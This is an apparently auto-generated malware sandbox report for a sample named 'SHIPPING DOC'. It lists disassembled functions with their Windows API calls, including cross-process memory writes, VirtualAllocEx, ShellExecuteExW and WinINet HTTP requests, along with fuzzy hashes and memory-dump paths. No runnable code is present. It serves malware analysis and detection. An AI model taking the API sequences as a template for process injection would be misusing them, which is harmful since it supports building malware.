                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Destroy$DeleteObjectWindow$Icon
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4023252218-0
                                                                                                                      • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                                                                      • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                                                                                                      • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                                                                      • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                                                                                                      • DeleteObject.GDI32(?), ref: 00455736
                                                                                                                      • DeleteObject.GDI32(?), ref: 00455744
                                                                                                                      • DestroyIcon.USER32(?), ref: 00455752
                                                                                                                      • DestroyWindow.USER32(?), ref: 00455760
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1489400265-0
                                                                                                                      • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                                                                      • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                                                                                                      • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                                                                      • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                                                                      • DestroyWindow.USER32(?), ref: 00455728
                                                                                                                      • DeleteObject.GDI32(?), ref: 00455736
                                                                                                                      • DeleteObject.GDI32(?), ref: 00455744
                                                                                                                      • DestroyIcon.USER32(?), ref: 00455752
                                                                                                                      • DestroyWindow.USER32(?), ref: 00455760
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1042038666-0
                                                                                                                      • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                                                                      • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                                                                                                      • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                                                                      • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                                                                                                      APIs
                                                                                                                      • __getptd.LIBCMT ref: 0041780F
                                                                                                                        • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                                                                        • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                                                                      • __getptd.LIBCMT ref: 00417826
                                                                                                                      • __amsg_exit.LIBCMT ref: 00417834
                                                                                                                      • __lock.LIBCMT ref: 00417844
                                                                                                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 938513278-0
                                                                                                                      • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                                                                      • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                                                                                                      • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                                                                      • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                                                                        • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                                        • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                                      • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                                                                        • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                                      • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                                                                      • ExitThread.KERNEL32 ref: 004151ED
                                                                                                                      • __freefls@4.LIBCMT ref: 00415209
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4247068974-0
                                                                                                                      • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                                                                      • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                                                                                                      • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                                                                      • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )$U$\
                                                                                                                      • API String ID: 0-3705770531
                                                                                                                      • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                                                                      • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                                                                                                      • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                                                                      • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 0046E505
                                                                                                                      • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                                                                                      • CoUninitialize.OLE32 ref: 0046E53D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                      • String ID: .lnk
                                                                                                                      • API String ID: 886957087-24824748
                                                                                                                      • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                                                                      • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                                                                                                      • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                                                                      • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove
                                                                                                                      • String ID: \
                                                                                                                      • API String ID: 4104443479-2967466578
                                                                                                                      • Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                                                                      • Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
                                                                                                                      • Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                                                                      • Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove
                                                                                                                      • String ID: \
                                                                                                                      • API String ID: 4104443479-2967466578
                                                                                                                      • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                                                                      • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                                                                                                                      • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                                                                      • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove
                                                                                                                      • String ID: \
                                                                                                                      • API String ID: 4104443479-2967466578
                                                                                                                      • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                                                                      • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                                                                                                                      • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                                                                      • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                                                                                                                      Strings
                                                                                                                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                                                                                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                      • API String ID: 708495834-557222456
                                                                                                                      • Opcode ID: ad57006ec1c627c896323e780c1188bc9069f79cba7bd3d755793e69e2ee2a80
                                                                                                                      • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                                                                                                      • Opcode Fuzzy Hash: ad57006ec1c627c896323e780c1188bc9069f79cba7bd3d755793e69e2ee2a80
                                                                                                                      • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                                                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                                                                                        • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                                                                                        • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                                                                                        • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                                                                                        • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                                                                                      • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                      • String ID: @
                                                                                                                      • API String ID: 4150878124-2766056989
                                                                                                                      • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                                                                      • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                                                                                                      • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                                                                      • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove
                                                                                                                      • String ID: \$]$h
                                                                                                                      • API String ID: 4104443479-3262404753
                                                                                                                      • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                                                                      • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                                                                                                      • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                                                                      • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                                                                                                      APIs
                                                                                                                      • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                                                                                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00457E09
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                                                                                      • String ID: <$@
                                                                                                                      • API String ID: 2417854910-1426351568
                                                                                                                      • Opcode ID: 024707e8d0be736fd9aee974053134abdf34597ecb22147b7e98c4ffc578353a
                                                                                                                      • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                                                                                                      • Opcode Fuzzy Hash: 024707e8d0be736fd9aee974053134abdf34597ecb22147b7e98c4ffc578353a
                                                                                                                      • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                                                                                                      APIs
                                                                                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
